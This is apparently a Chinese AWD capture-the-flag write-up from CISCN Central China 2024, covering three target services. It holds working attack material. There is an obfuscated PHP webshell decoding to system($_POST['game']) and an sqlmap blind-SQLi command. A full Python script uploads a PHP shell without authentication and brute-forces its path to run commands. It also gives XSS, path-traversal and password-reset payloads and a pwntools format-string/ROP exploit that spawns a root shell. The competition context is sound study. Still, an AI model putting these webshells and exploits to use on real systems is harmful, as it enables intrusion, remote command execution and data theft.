CISCN华中2024AWD WP

gaatitrack

漏洞1:免杀混淆马

<?php /* Obfuscated webshell: goto-spaghetti plus an escaped class name. The class name "\x73\163\x79\x73\x67\141\x6d\x65\164\x65\x6d" decodes to "ssysgametem"; $WFOjN = substr(name, 1, 3) . substr(name, 8) = "sys" . "tem" = "system", and substr(name, 4, 4) = "game" is the POST key it reads. Net effect: @system($_POST['game']). Kept byte-identical so the sample can be used as-is for IOC/signature matching. */ goto PFBx1; CEKfL: $WFOjN = substr((string) $tCGqQ->getName(), 1, 3) . substr((string) $tCGqQ->getName(), 8); goto i8J9H; PFBx1: class ssysgametem { public $u0yA0; } goto cYm2s; VUGem: @($tCGqQ->u0yA0 = $_POST[substr((string) $tCGqQ->getName(), 4, 4)]); goto CEKfL; cYm2s: $tCGqQ = new ReflectionClass("\x73\163\x79\x73\x67\141\x6d\x65\164\x65\x6d"); goto VUGem; i8J9H: @$WFOjN($tCGqQ->u0yA0);

类名由十六进制/八进制转义拼成,解码后为 ssysgametem;$WFOjN 取其 substr(1,3) 与 substr(8) 拼接,打印后确认是 system。直接打印 $tCGqQ->u0yA0 为空(它只在运行时由 POST 参数填充),搜索 $_POST 可见键名来自 substr(类名, 4, 4),打印得到 game,即该马最终执行的是 system($_POST['game'])。

// Debug line dropped into the webshell: prints the resolved function name and the
// POST key it reads, separated by two tabs (same bytes as the original echo).
printf("%s\t\t%s", @$WFOjN, substr((string) $tCGqQ->getName(), 4, 4));

4pzcws6b

验证

image-20240829135433248

漏洞2: CVE-2023-48823

/var/www/html/ajax.php 的登录处理(action=login)中,POST 参数 email 存在 SQL 盲注;详见 Packet Storm 上的公告 "GaatiTrack Courier Management System 1.0 SQL Injection"(packetstormsecurity.com)。防守方应在该处改为预处理语句/参数化查询。

# Blind SQLi in the login handler's POST "email" field (CVE-2023-48823 per the writeup above).
# "%40" is a URL-encoded "@"; --batch takes sqlmap's defaults without prompting; -a (--all)
# enumerates and dumps everything, which is slow and noisy in a timed AWD round — narrow it
# to --dbs / --tables / --dump -T <table> once the injection is confirmed.
python3 sqlmap.py -u "http://192.168.232.133:7001/ajax.php?action=login"  --data="email=test%40"   -a   --batch

image-20240828220128460

漏洞3:后台账户密码泄露

网站目录下的子目录 Credentials/ 中存放着 username and password.txt,可被直接下载,其中明文记录了后台账户密码(防守时应删除该文件,或至少禁止 Web 访问该目录)。

Username : mayuri.infospace@gmail.com
Password : admin

漏洞4:后台任意文件上传

后台"用户管理"处的头像上传(ajax.php?action=update_user 的 img 字段)可直接上传 .php 文件,构成任意文件上传。

image-20240829120821581

服务端以 time() 时间戳 + '_' + 原文件名保存上传文件(落在 assets/uploads/ 下),因此脚本按本地时间附近枚举该文件名;该接口无需登录即可调用。poc 如下:

import time
import requests
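ip = "http://192.168.232.133:7001/"
# `ip` already ends in "/", so strip it before joining to avoid a "//ajax.php" URL.
burp0_url = ip.rstrip("/") + "/ajax.php?action=update_user"
burp0_headers = {
    "Accept": "*/*",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary8BMXafUA11P6WdIS",
    "Origin": "http://192.168.232.133:7001",
    "Referer": "http://192.168.232.133:7001/index.php?page=home",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Connection": "close",
}
# Hand-built multipart body (copied from Burp) so the bytes on the wire are exactly what
# the browser sent; the "img" part carries a one-line PHP shell under the name 1.php.
burp0_data = "------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nMayuri K\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nK\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"email\"\r\n\r\nmayuri.infospace@gmail.com\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"img\"; filename=\"1.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php @system($_POST['a']);?>\r\n------WebKitFormBoundary8BMXafUA11P6WdIS--\r\n"

REQUEST_TIMEOUT = 10  # seconds; a hung target must not stall the whole AWD round


def upload_shell():
    """Send the unauthenticated update_user request that drops 1.php into the upload dir.

    Returns the requests.Response (only useful for debugging: the stored filename is
    not returned, it has to be brute-forced by timestamp, see find_shell).
    """
    return requests.post(burp0_url, headers=burp0_headers, data=burp0_data,
                         timeout=REQUEST_TIMEOUT)


def find_shell(base_ts, lookback=100, lookahead=5, cmd="cat /flag.txt"):
    """Locate the uploaded shell by timestamp and run `cmd` through it.

    The server stores the upload as "<unix time>_1.php" under assets/uploads/.
    Our clock and the target's may be skewed, so a few seconds *ahead* of our
    timestamp are tried as well as `lookback` seconds behind it.  Prints and
    returns the URL of the first HTTP 200 (plus the command output), else None.
    NOTE: a custom 404 page served with status 200 would be a false positive.
    """
    for delta in range(-lookahead, lookback):
        url = ip + "assets/uploads/" + str(base_ts - delta) + "_1.php"
        resp = requests.post(url, {"a": cmd}, timeout=REQUEST_TIMEOUT)
        if resp.status_code == 200:
            print(url)
            print(resp.text)
            return url
    return None


if __name__ == "__main__":
    res = upload_shell()
    t = int(time.time())  # taken right after the upload returns
    print(t)
    find_shell(t)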

漏洞5:xss

/manage_parcel_status.php?id=\"><sCrIpT>alert(document.cookie)</sCrIpT>"

warehouse

漏洞1:任意文件读取

注意:重新搭建环境后,需要先为用户上传一张头像,该接口才能正常读取文件,否则下面的 poc 不会生效。

poc:

/file/showImageByPath?path=../../../../../../../../../flag

漏洞2:后台弱口令

在 db.sql 中搜索"超级管理员",可找到管理员账号 system;使用弱口令 123456 即可登录后台。

漏洞3:任意用户重置管理员密码

poc:

/user/resetPwd/1   #1为超级管理员的id

image-20241204204228210

漏洞4:未授权访问

poc:

/user/loadAllUser

漏洞5:XSS漏洞

在商品进货/销售处新增记录时,备注字段存在 XSS 漏洞。

image-20241204204809713

image-20241204204758516

game

exp

import struct
from pwn import *
import warnings
# Presumably quiets pwntools' str->bytes BytesWarning: recvuntil()/sendline() below are
# handed str payloads rather than bytes.  Harmless, but it hides the warnings, not the cause.
warnings.filterwarnings("ignore", category=BytesWarning)

DELTA = 0x9e3779b9

def xxtea_encrypt(data, key):
def mx(sum, y, z, p, e, key):
return (((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4))) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z))

n = len(data) - 1
z = data[n]
y = data[0]
sum = 0
q = 6 + 52 // (n + 1)
while q > 0:
q -= 1
sum = (sum + DELTA) & 0xffffffff
e = (sum >> 2) & 3
for p in range(n):
y = data[p + 1]
z = data[p] = (data[p] + mx(sum, y, z, p, e, key)) & 0xffffffff
y = data[0]
z = data[n] = (data[n] + mx(sum, y, z, n, e, key)) & 0xffffffff
return data

def xxtea_decrypt(data, key):
def mx(sum, y, z, p, e, key):
return (((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4))) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z))

n = len(data) - 1
z = data[n]
y = data[0]
q = 6 + 52 // (n + 1)
sum = (q * DELTA) & 0xffffffff
while sum != 0:
e = (sum >> 2) & 3
for p in range(n, 0, -1):
z = data[p - 1]
y = data[p] = (data[p] - mx(sum, y, z, p, e, key)) & 0xffffffff
z = data[n]
y = data[0] = (data[0] - mx(sum, y, z, 0, e, key)) & 0xffffffff
sum = (sum - DELTA) & 0xffffffff
return data

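def str_to_uint32(data):
    """Pack a str into little-endian uint32 words, NUL-padded to a multiple of 4 bytes.

    The original padded the *str* by character count and only then UTF-8 encoded
    it, so any non-ASCII text produced a byte string that was not a multiple of
    four and struct.unpack raised.  Encode first, then pad the bytes.
    Returns [] for the empty string.
    """
    raw = data.encode("utf-8")
    n = (len(raw) + 3) // 4
    raw = raw.ljust(n * 4, b"\0")
    return list(struct.unpack(f"<{n}I", raw))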

def uint32_to_str(data):
    """Inverse of str_to_uint32: little-endian uint32 words -> UTF-8 str, NUL padding stripped.

    Raises UnicodeDecodeError if the words do not form valid UTF-8 (e.g. ciphertext).
    """
    count = len(data)
    raw = struct.pack(f"<{count}I", *data)
    text = raw.decode("utf-8")
    return text.rstrip("\0")


# The login text the target prompts for: the greeting XXTEA-encrypted under the
# hard-coded key, rendered as 8 lowercase hex digits per word.
key = [0x12345678, 0x9abcdef0, 0x11223344, 0x55667788]
text = "Hello, Welcome to CISCN, CTFer!"
data = str_to_uint32(text)
encrypted_data = xxtea_encrypt(list(data), key)  # copy: xxtea_encrypt works in place
encrypted_text = "".join(map("{:08x}".format, encrypted_data))


def lg(s):
    """Log a leaked value as green name -> cyan hex via pwntools' log.success.

    `s` is the *name* of a module-level variable and is eval()ed to fetch its
    value; it is only ever called with literal names from this script, never
    with anything attacker-controlled.
    """
    return log.success('\033[1;32;1m%s\033[0m -> \033[1;36;1m0x%x\033[0m' % (s, eval(s)))


print(encrypted_text)

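def dbg(gdbscript = None):
    """Attach gdb to the live `io` process in a new tmux pane and pause until resumed.

    `gdbscript` is optional extra gdb commands appended after the init line.  The
    original did str(gdbscript) unconditionally, so a bare dbg() fed the literal
    command "None" to gdb; pass "" in that case instead.
    `gcinit -m64 2.31` is a user-defined gdb command (presumably loads glibc-2.31
    debug helpers); it must exist in the local .gdbinit or gdb reports it undefined.
    Relies on the module-level `io` tube created below.
    """
    context.terminal = ["tmux", "splitw", "-h"]
    extra = "" if gdbscript is None else str(gdbscript)
    gdb.attach(io, "gcinit -m64 2.31\n" + extra)
    pause()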


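io = process('./pwn')
# io = remote('127.0.0.1', 9999)   # swap in for the live target
libc = ELF('./libc-2.31.so')
context.log_level = 'debug'

# Stage 1: format-string leak.  The login text is echoed back, so anything appended
# to it is printed too: %p leaks a libc pointer, %29$p the stack canary.
payload = encrypted_text + '%p%29$p'
io.recvuntil('Enter your login text:')
io.sendline(payload)

# Sync on the echo of our own (known) login text, then read the two %p values.
io.recvuntil('453a8f8cfa6533fbd8cbf90fd61e1ec517194f21c734a1f4586449aff8a8cf92')
# Fixed-width reads: "0x" + 12 hex digits for a 0x7f... userland pointer, "0x" + 16
# for the canary.  Brittle — a canary whose top byte is 0 prints shorter and this blocks.
leak_addr = int(io.recv(14), 16)
lg('leak_addr')

# Distance from the leaked pointer to libc base, measured once in gdb on this
# libc-2.31 build (leak 0x7f7e0a864723 with libc mapped at 0x7f7e0a677000);
# it differs for any other libc.
offset = 0x7f7e0a864723 - 0x7f7e0a677000
libc.address = leak_addr - offset
lg('libc.address')

system = libc.sym['system']
bin_sh = next(libc.search(b"/bin/sh"))

canary = int(io.recv(18), 16)
lg('canary')

# Stage 2: stack overflow.  136 bytes of filler reach the canary, then saved rbp,
# then the return address.  ROP chain: pop rdi; ret <- "/bin/sh"; a lone ret to
# re-align the stack (glibc's system wants 16-byte alignment); system.
# Gadget offsets are for this libc-2.31 build only:
#   ROPgadget --binary libc-2.31.so --only "pop|ret"
POP_RDI_RET = 0x0000000000023b6a
RET = 0x00000000000be2f9

payload = b'a' * 136
payload += p64(canary)
payload += p64(0)  # saved rbp
payload += p64(libc.address + POP_RDI_RET)
payload += p64(bin_sh)
payload += p64(libc.address + RET)
payload += p64(system)

# dbg()   # uncomment to break before the overflow is sent
io.sendline(payload)
# Two leading newlines flush whatever prompt is pending; `find ... -exec /bin/sh -p`
# presumably relies on a SUID find on the target, -p keeping the elevated privileges.
# "\\;" is the literal backslash-semicolon find expects (the original wrote the
# invalid escape "\;", which Python only keeps verbatim with a DeprecationWarning).
io.sendline('\n\nfind flag -exec /bin/sh -p \\;')

io.interactive()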
